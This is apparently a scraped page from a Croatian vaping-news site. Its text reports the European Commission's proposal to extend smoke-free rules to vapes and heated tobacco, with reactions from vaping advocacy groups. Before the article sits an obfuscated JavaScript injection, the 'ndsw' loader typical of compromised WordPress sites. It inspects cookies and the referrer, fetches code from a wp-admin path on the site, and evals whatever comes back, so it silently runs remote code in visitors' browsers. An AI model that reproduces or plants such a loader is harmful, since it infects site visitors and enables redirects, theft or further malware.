;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Prijedlog Komisije EU za proširenje preporuke o okruženjima bez dima

Krajem lipnja Europska komisija objavila je poziv za podnošenje dokaza o prijedlogu proširenja preporuke iz 2009. o okruženjima bez duhanskog dima kako bi uključila vaping i grijane duhanske proizvode.

Cilj preporuke je potaknuti sve države članice EU-a da provedu zabrane vapinga i upotrebe grijanog duhana na raznim javnim mjestima. Dok se u dokumentu koji podržava preporuku koja pokriva “unutarnje i zatvorene prostore” dodaje da politike za “vanjske prostore, kao što su škole, igrališta i restorani na otvorenom” nisu uključene u opseg preporuke EU-a, već bi se o njima trebalo odlučiti od slučaja do slučaja vlade pojedinih država članica EU.

EK želi ograničiti korištenje sigurnijih nikotinskih alternativa

Komisija namjerava promijeniti preporuku kako bi izričito uključila određene vanjske i kvazi-otvorene prostore u definiciju okruženja bez dima i proširila područje primjene na sigurnije nikotinske alternative kao što su vape i grijani duhanski proizvodi.

Nova nikotinska alijansa (NNA) dostavila je odgovor na ovaj pogrešan prijedlog ističući da nažalost EU ukazuje na vrlo kritizirana i manjkava izvješća WHO-a i odbora SCHEER kao svoje opravdanje.

Slično kao odgovor na prijedlog, direktor Svjetskog saveza vejpera (WVA), istaknuo je da je ovo još jedan pogrešan napad na smanjenje štete od duhana. “Šokantno je da se Europska komisija još uvijek bori protiv smanjenja štete od duhana. Potrebno nam je što više opcija kako bismo postigli cilj Komisije od 5% pušenja. Vaping, nikotinske vrećice i grijani duhanski proizvodi, svi oni pomažu ljudima da prestanu pušiti i manje su štetni.”

Choose your Reaction!
  • Znači dokažeš da je nešto puno manje štetnije od cigarete i oni se poseru na to :)

Leave a Comment